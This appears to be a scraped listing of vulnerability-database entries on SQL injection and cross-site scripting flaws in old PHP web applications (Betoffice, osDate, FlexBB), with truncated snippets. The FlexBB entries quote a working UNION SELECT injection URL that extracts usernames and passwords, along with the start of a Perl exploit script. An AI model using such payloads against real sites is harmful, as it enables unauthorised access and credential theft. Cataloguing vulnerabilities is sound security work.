Sql injection

Multiple SQL injection vulnerabilities in Betster aka PHP Betoffice 1.0.4 allow remote attackers to execute arbitrary SQL commands via the id parameter to 1 showprofile.php or 2 categoryedit.php or 3 username parameter in a login to index.php...

PHP Betoffice (Betster) 1.0.4 - Authentication Bypass SQL Injection

PHP Betoffice Betster 1.0.4 - Authentication Bypass SQL Injection ?php / ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / \ / / XXXXXX /\ / XXXXXX / / XXXXXX /...

CVE-2006-3767

Cross-site scripting XSS vulnerability in showprofile.php in Darren's $5 Script Archive osDate 1.1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the onerror attribute in an HTML IMG tag with a non-existent source file in txtcomment parameter, which is used when...

FlexBB <= 0.5.5 (function/showprofile.php) SQL Injection Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; FlexBB Exploit function/showprofile.php Remote SQL Injection 1- First Do Login 2- View This Link :D index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM...

FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection

!/usr/bin/perl use IO::Socket; FlexBB Exploit function/showprofile.php Remote SQL Injection 1- First Do Login 2- View This Link :D index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbbusers WHERE id=1/...